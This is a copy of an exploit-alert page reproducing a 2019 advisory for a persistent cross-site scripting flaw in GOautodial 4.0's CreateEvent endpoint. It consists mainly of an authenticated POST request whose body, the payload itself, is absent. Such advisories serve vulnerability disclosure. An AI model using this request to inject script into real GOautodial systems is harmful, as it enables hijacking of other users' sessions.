Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

GOautodial 4.0 Cross Site Scripting
# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2019-09-19
# Vendor Homepage:
# Software Link:
# Tested Version: 4.0
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Simple XSS attack after application authentication. 

# POST Request

POST /php/CreateEvent.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
Connection: close
DNT: 1


Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.